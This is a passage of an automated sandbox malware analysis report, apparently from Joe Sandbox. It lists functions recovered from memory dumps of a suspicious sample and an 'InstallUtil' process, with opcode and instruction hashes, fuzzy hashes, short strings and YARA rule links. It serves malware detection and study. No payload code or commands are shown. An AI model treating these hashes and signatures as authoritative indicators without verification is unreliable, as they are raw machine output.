                                                                                                                                              • Snapshot File: hcaresult_15_2_99d000_Lutyzivrgpnlssvvvftlfile.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 28aa67dcb75984245c16e37ac84c0a065819206c816fa668188daf7c21b22587
                                                                                                                                              • Instruction ID: d406aa716dba7a3be264eb030a928740dbb240a55fff5a001bf25396e9125f64
                                                                                                                                              • Opcode Fuzzy Hash: 28aa67dcb75984245c16e37ac84c0a065819206c816fa668188daf7c21b22587
                                                                                                                                              • Instruction Fuzzy Hash: EF21F275605244DFDF15DF1CD9C0B26BBA5FB88314F24CA6ED8494B246C33BD846CA62
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0098D11F Relevance: .1, Instructions: 56COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000F.00000002.553067403.000000000098D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0098D000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_15_2_98d000_Lutyzivrgpnlssvvvftlfile.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 4e78fb41457c0dbc2d9524af8796639b843feda46be7989836c0fd150c2e2370
                                                                                                                                              • Instruction ID: 6a9d3aae2c874e8ddcd0972653a957439e7725f0c3bedd9966f9a323875dc532
                                                                                                                                              • Opcode Fuzzy Hash: 4e78fb41457c0dbc2d9524af8796639b843feda46be7989836c0fd150c2e2370
                                                                                                                                              • Instruction Fuzzy Hash: DA11BE76504280CFCB16DF14D9C4B56BF71FF84324F2886A9D8444B656C33AD85ACBA2
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0098D4D3 Relevance: .1, Instructions: 56COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000F.00000002.553067403.000000000098D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0098D000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_15_2_98d000_Lutyzivrgpnlssvvvftlfile.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 4e78fb41457c0dbc2d9524af8796639b843feda46be7989836c0fd150c2e2370
                                                                                                                                              • Instruction ID: 3c9696b1b7076007837e20518c7e6a3e273ff8d0ccc5e219c835dea8d0ef8aac
                                                                                                                                              • Opcode Fuzzy Hash: 4e78fb41457c0dbc2d9524af8796639b843feda46be7989836c0fd150c2e2370
                                                                                                                                              • Instruction Fuzzy Hash: 53110376404280CFCB02DF04D9C0B16BF71FB84324F2886AAE8050B35AC33AD856CBA2
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0098D819 Relevance: .0, Instructions: 45COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000F.00000002.553067403.000000000098D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0098D000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_15_2_98d000_Lutyzivrgpnlssvvvftlfile.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 4bef4ad1ce5865a2a360ab7ef397513b320be2759e8929d0a584fe5d376199e8
                                                                                                                                              • Instruction ID: 1004e5ad43ec290c84eced35b488432c47e05ae4ebaefa43688f2aa5b9b0bb71
                                                                                                                                              • Opcode Fuzzy Hash: 4bef4ad1ce5865a2a360ab7ef397513b320be2759e8929d0a584fe5d376199e8
                                                                                                                                              • Instruction Fuzzy Hash: 7401F7715063449AE720AA2ADC84767BF9CEF55334F18855AED051B3C6C3799840C7B2
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0098D818 Relevance: .0, Instructions: 36COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000F.00000002.553067403.000000000098D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0098D000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_15_2_98d000_Lutyzivrgpnlssvvvftlfile.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: b48bca8b302a0e35b2149c9f31fefc5f2b4e71531f8ed4448885d4dcf93ecd01
                                                                                                                                              • Instruction ID: d93f012835a1ddb561694caf18a7d065133ce45b62e0d7f6af28d20d13092a52
                                                                                                                                              • Opcode Fuzzy Hash: b48bca8b302a0e35b2149c9f31fefc5f2b4e71531f8ed4448885d4dcf93ecd01
                                                                                                                                              • Instruction Fuzzy Hash: B0F0C271505244AAE7208E1ADC84B62FF9CEB41334F18C55AED081F3C2C3799C44CBB1
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Executed Functions

                                                                                                                                              Function 00007FFBAD403EDF Relevance: 2.0, Strings: 1, Instructions: 743COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.561298167.00007FFBAD400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD400000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_7ffbad400000_InstallUtil.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: ,p_H
                                                                                                                                              • API String ID: 0-3665113075
                                                                                                                                              • Opcode ID: e4d3639eddd7aed7046cddc84f0e50cacf7c2fbfe17860e0a073652468a0352d
                                                                                                                                              • Instruction ID: 61d6a4af4bfdb32d91e7d015dcf313ce2cbbda0c5d496fa05688cc3f14999d56
                                                                                                                                              • Opcode Fuzzy Hash: e4d3639eddd7aed7046cddc84f0e50cacf7c2fbfe17860e0a073652468a0352d
                                                                                                                                              • Instruction Fuzzy Hash: E6220571B189194FEB5DDA2CC8456B873D2EF98311B1846BDD89FC7297EE28EC428740
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00007FFBAD400CAA Relevance: 1.4, Strings: 1, Instructions: 146COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.561298167.00007FFBAD400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD400000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_7ffbad400000_InstallUtil.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 5]_^
                                                                                                                                              • API String ID: 0-858085124
                                                                                                                                              • Opcode ID: ea70e0192a71932504907093d4bd7fecd94d2cb9e712a86ea08f093b15ccdb91
                                                                                                                                              • Instruction ID: 2eede49b834be6a6c3a7aa82c8ca4b065d6eee2132467fbc84705a762c47781c
                                                                                                                                              • Opcode Fuzzy Hash: ea70e0192a71932504907093d4bd7fecd94d2cb9e712a86ea08f093b15ccdb91
                                                                                                                                              • Instruction Fuzzy Hash: 6D415B5784E1EA56DE12B638B4451FC7B40DF05321B010A33E6DEDA053BE2C798AC1E1
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00007FFBAD403467 Relevance: 2.7, Strings: 2, Instructions: 220COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.561298167.00007FFBAD400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD400000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_7ffbad400000_InstallUtil.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: ]_^$)c
                                                                                                                                              • API String ID: 0-144568425
                                                                                                                                              • Opcode ID: c1d8285ff5a7770cd4bc92de47bb957c7221d43ba7eb2cc8363635ff34f352ff
                                                                                                                                              • Instruction ID: 0c68c607a1c36f58e4cbce17255c611efcab4e329dc16a952aed9c22fd363082
                                                                                                                                              • Opcode Fuzzy Hash: c1d8285ff5a7770cd4bc92de47bb957c7221d43ba7eb2cc8363635ff34f352ff
                                                                                                                                              • Instruction Fuzzy Hash: 3151D55B9091AA16EE11B77CB48A1FC2B40CF45732B000577E3D9DD0B3AE2969DAC2A5
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00007FFBAD403483 Relevance: 2.7, Strings: 2, Instructions: 216COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.561298167.00007FFBAD400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD400000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_7ffbad400000_InstallUtil.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: ]_^$)c
                                                                                                                                              • API String ID: 0-144568425
                                                                                                                                              • Opcode ID: f81a8ade938d806064e490914ffa0cb15987938a49115990d7349eb5633836d3
                                                                                                                                              • Instruction ID: a7f8964c61376fe2b5f60f17bfdbb858d4f73498f46b82676cb027aa843b8a27
                                                                                                                                              • Opcode Fuzzy Hash: f81a8ade938d806064e490914ffa0cb15987938a49115990d7349eb5633836d3
                                                                                                                                              • Instruction Fuzzy Hash: 6151E75B9091BA16EA11B77CB48A1FC2B40CF45732B000577E399CD0B3AE2969DAC2A5
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00007FFBAD4034A8 Relevance: 2.7, Strings: 2, Instructions: 203COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.561298167.00007FFBAD400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD400000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_7ffbad400000_InstallUtil.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: ]_^$)c
                                                                                                                                              • API String ID: 0-144568425
                                                                                                                                              • Opcode ID: e08c73f4696a6bf5c961e58aee57102c17778c4c01b6ecab27bd086ffa1fe94f
                                                                                                                                              • Instruction ID: 97a63c487ff44acfd89534b9fcba9b01da713e791a18c54448f09e0c04a08ab5
                                                                                                                                              • Opcode Fuzzy Hash: e08c73f4696a6bf5c961e58aee57102c17778c4c01b6ecab27bd086ffa1fe94f
                                                                                                                                              • Instruction Fuzzy Hash: B751D75B9091BA16EE11B77CF48A1FC2B40DF45732B000577D399DD0B3EE2869DAC2A5
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00007FFBAD40B0AC Relevance: .3, Instructions: 267COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.561298167.00007FFBAD400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD400000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_7ffbad400000_InstallUtil.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: e7983972ba1a8049227dcad8ab769af018bc3d450705dcf9dd9c10d716425c9a
                                                                                                                                              • Instruction ID: b49a844d86fdeb5c9ec79b12d8f85348067b3a29f6fb9e0fb697c5d606a771a8
                                                                                                                                              • Opcode Fuzzy Hash: e7983972ba1a8049227dcad8ab769af018bc3d450705dcf9dd9c10d716425c9a
                                                                                                                                              • Instruction Fuzzy Hash: A471487290DB8A1FD352DF38C8591A57BE0FF59310B040BBAD889C7597EE2CA942C791
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00007FFBAD404349 Relevance: .3, Instructions: 267COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.561298167.00007FFBAD400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD400000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_7ffbad400000_InstallUtil.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: da44e9a8f17c6aa6a752c2418226bbb6c4e5beea6079f2374ecd351896fa4980
                                                                                                                                              • Instruction ID: e28c9c5cb186d9c83196a64ca030fc1b0306421e27d30f8d827acbce888b3dc5
                                                                                                                                              • Opcode Fuzzy Hash: da44e9a8f17c6aa6a752c2418226bbb6c4e5beea6079f2374ecd351896fa4980
                                                                                                                                              • Instruction Fuzzy Hash: 48815C307099198FDB99EB2CC459B7877E2FF98311F1405AAE44EC72A2DE24EC42CB45
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00007FFBAD400585 Relevance: .2, Instructions: 196COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.561298167.00007FFBAD400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD400000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_7ffbad400000_InstallUtil.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 3dd538152b725b2e85333c96f3f99a9affffa95497447ea4655aecc131193cf7
                                                                                                                                              • Instruction ID: 1b3f940589476425715483ab47296fa9c470dcaec1157406328fbc9aa740b81c
                                                                                                                                              • Opcode Fuzzy Hash: 3dd538152b725b2e85333c96f3f99a9affffa95497447ea4655aecc131193cf7
                                                                                                                                              • Instruction Fuzzy Hash: 1F51C89190EADA6FE7A7D7784466275AFD1DF49250F4809FEC88EC72C3ED0C68018392
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00007FFBAD4048F3 Relevance: .2, Instructions: 169COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.561298167.00007FFBAD400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD400000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_7ffbad400000_InstallUtil.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 1cd6f1a3db052edfaa6774b028696cdeda9b5ec35e1503affe05932266138f04
                                                                                                                                              • Instruction ID: aa183eb6561cb600a7dd8aa9258e5ea0d623c0bc137602f19b1da674db7bbb86
                                                                                                                                              • Opcode Fuzzy Hash: 1cd6f1a3db052edfaa6774b028696cdeda9b5ec35e1503affe05932266138f04
                                                                                                                                              • Instruction Fuzzy Hash: 2551D67090E9599FD7A9DB38D4556B977E0FF8D310B0005FAD84DC7A92EE286906CB40
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00007FFBAD4007AD Relevance: .2, Instructions: 162COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.561298167.00007FFBAD400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD400000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_7ffbad400000_InstallUtil.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: d1965932920ad185ff5230940209728a26c614a6d7177c155b3f5465c9573a23
                                                                                                                                              • Instruction ID: c657d64c5e4d476714138059fd8fccefcc273970af5fa2944b8afbe1079cec21
                                                                                                                                              • Opcode Fuzzy Hash: d1965932920ad185ff5230940209728a26c614a6d7177c155b3f5465c9573a23
                                                                                                                                              • Instruction Fuzzy Hash: F241E5A2E1D95E6FEB95E77894152F9BBE1FF49340F4405B9D44EC3182EE2C58028391
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00007FFBAD407925 Relevance: .2, Instructions: 155COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.561298167.00007FFBAD400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD400000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_7ffbad400000_InstallUtil.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: c7cd9b302ba23ed76e9af385a17a9b0d1c5475e6b743a8e37a21ed552e48f5b1
                                                                                                                                              • Instruction ID: 653dbf3aa2dd0b005c8311b54938824133cc35ac8e75f9f68a906bcc2d67e8f2
                                                                                                                                              • Opcode Fuzzy Hash: c7cd9b302ba23ed76e9af385a17a9b0d1c5475e6b743a8e37a21ed552e48f5b1
                                                                                                                                              • Instruction Fuzzy Hash: 10414BA160E6862FF75A86789C560B97B91DF4B220B4805FFC48AC75D3FD0D58038353
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00007FFBAD4038A8 Relevance: .2, Instructions: 154COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.561298167.00007FFBAD400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD400000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_7ffbad400000_InstallUtil.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 43201dad9405b21f3ca0becc6d251d5b9f25b57a294f60176f46c238dcd28228
                                                                                                                                              • Instruction ID: cda39aca4cdde4bfef8070c23f22059ef9d54fbaeab6bcd62725fa5f0430c3d1
                                                                                                                                              • Opcode Fuzzy Hash: 43201dad9405b21f3ca0becc6d251d5b9f25b57a294f60176f46c238dcd28228
                                                                                                                                              • Instruction Fuzzy Hash: 53413E9191E6C62FE757977848551BA7FE0DF4A201F0808FAD889C71D3ED1C6806C393
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00007FFBAD409935 Relevance: .1, Instructions: 135COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.561298167.00007FFBAD400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD400000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_7ffbad400000_InstallUtil.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 4a5c87f5d444ba6ae038967bdab57afe1644957ee094cb66e5ff061800c5e062
                                                                                                                                              • Instruction ID: cfa3bbd7f59f36f3cc47046dcdab0bd55d2ab09506e9686b92107510151a968f
                                                                                                                                              • Opcode Fuzzy Hash: 4a5c87f5d444ba6ae038967bdab57afe1644957ee094cb66e5ff061800c5e062
                                                                                                                                              • Instruction Fuzzy Hash: 6F41CAB190E6869FD71ACF24D8515B977B1FF4D320F18056ED85A872C2DE3DAC128781
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00007FFBAD402691 Relevance: .1, Instructions: 133COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.561298167.00007FFBAD400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD400000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_7ffbad400000_InstallUtil.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 304bdb6aace808ae6d9af370d21a780001d614dde5e21f33865dc96dda8ba4fb
                                                                                                                                              • Instruction ID: 099e47d56dd49f9cc154de106da2cf7651ecf9fdd541fe4fc088d6e96fcf08a3
                                                                                                                                              • Opcode Fuzzy Hash: 304bdb6aace808ae6d9af370d21a780001d614dde5e21f33865dc96dda8ba4fb
                                                                                                                                              • Instruction Fuzzy Hash: 0A41BFA190E7C64FE7538B7488606A97FB0FF4B314F1906EBC485DB1D3EA28194AD712
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00007FFBAD4009DD Relevance: .1, Instructions: 125COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.561298167.00007FFBAD400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD400000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_7ffbad400000_InstallUtil.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 803b2bc62f51660b33cfd7d48814a7a0e4f5d39015401e2a15d631c3c917979c
                                                                                                                                              • Instruction ID: 0fbf1b57c0c772327c50bf62d7154ee214a764c5a053958dd1ebe18ee1bee871
                                                                                                                                              • Opcode Fuzzy Hash: 803b2bc62f51660b33cfd7d48814a7a0e4f5d39015401e2a15d631c3c917979c
                                                                                                                                              • Instruction Fuzzy Hash: 9F3109A198E9C62FE35793B858660F57FD0DF5A251B0905FAD48ACB5D3EC0C2943C392
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00007FFBAD407CD5 Relevance: .1, Instructions: 121COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.561298167.00007FFBAD400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD400000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_7ffbad400000_InstallUtil.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 795bba9d2f5af785419afff5b8700e601d3782bae6e9d3fd2cdd91113f5c27fa
                                                                                                                                              • Instruction ID: aff2093ae34d47b205ad188dcbee0325fd230df7b83bf2b76f9a974862086c55
                                                                                                                                              • Opcode Fuzzy Hash: 795bba9d2f5af785419afff5b8700e601d3782bae6e9d3fd2cdd91113f5c27fa
                                                                                                                                              • Instruction Fuzzy Hash: 6131CBA1A0E9872FE767D63C84651BA77D1DF5A2417140ABEC88EC72D6ED1C980643C2
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00007FFBAD40BC55 Relevance: .1, Instructions: 93COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.561298167.00007FFBAD400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD400000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_7ffbad400000_InstallUtil.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 8d9530aeff6e9c13c1c4cfffb5cde76555c71fb65f9b97a56629b04419c96083
                                                                                                                                              • Instruction ID: 3a387f2e857d86b13924b8637257738b6572a96ae97bf7c7c625dab713f24ffc
                                                                                                                                              • Opcode Fuzzy Hash: 8d9530aeff6e9c13c1c4cfffb5cde76555c71fb65f9b97a56629b04419c96083
                                                                                                                                              • Instruction Fuzzy Hash: 1A315C75C0D15EAAFB01BB78E4460EC7BA0DF05321F040576D609DA197DE3C99C9CB95
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00007FFBAD407940 Relevance: .1, Instructions: 83COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.561298167.00007FFBAD400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD400000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_7ffbad400000_InstallUtil.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: e5c405dc6337ef3087d41cce0e9eddd4906cdeac622e14b31ac5368278b5842f
                                                                                                                                              • Instruction ID: d5cc83132e08458ce0b697ed4017410b8db8012fce0a129a8b53eeb3483bfc2c
                                                                                                                                              • Opcode Fuzzy Hash: e5c405dc6337ef3087d41cce0e9eddd4906cdeac622e14b31ac5368278b5842f
                                                                                                                                              • Instruction Fuzzy Hash: 6B113BB251D9892FE36996785C5A4B67BD4DF8B02078405BFC8C6C7993FC09180383D3
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00007FFBAD4099E2 Relevance: .1, Instructions: 78COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.561298167.00007FFBAD400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD400000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_7ffbad400000_InstallUtil.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 9cb4dca8c30f2f119a742127a6b03b21619fa5ce54a72037ffea9f6547a356f9
                                                                                                                                              • Instruction ID: d49e8082035b8d6adb1843fe4e9c882a7c354c9edcd2e8c95349b4dc29f6c9c9
                                                                                                                                              • Opcode Fuzzy Hash: 9cb4dca8c30f2f119a742127a6b03b21619fa5ce54a72037ffea9f6547a356f9
                                                                                                                                              • Instruction Fuzzy Hash: D121B7B090D6869FE766DE24C85167977B1FF49300B2809BDCC5F871C6EE2D6C028641
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00007FFBAD402CD9 Relevance: .1, Instructions: 74COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.561298167.00007FFBAD400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD400000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_7ffbad400000_InstallUtil.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 09d8fde04ddd1e163b80645bb081304f82cde9ef5d9c6126cc579f09cca661ef
                                                                                                                                              • Instruction ID: 46a3171cd5109383098653ef28111fcb5b15ce42802ee802955182bfc94098a6
                                                                                                                                              • Opcode Fuzzy Hash: 09d8fde04ddd1e163b80645bb081304f82cde9ef5d9c6126cc579f09cca661ef
                                                                                                                                              • Instruction Fuzzy Hash: 9911916154E6C44FD34787B888646A03FF1EF8B210B0945EBD589CB1A7D91D590BD361
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00007FFBAD400AA5 Relevance: .1, Instructions: 71COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.561298167.00007FFBAD400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD400000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
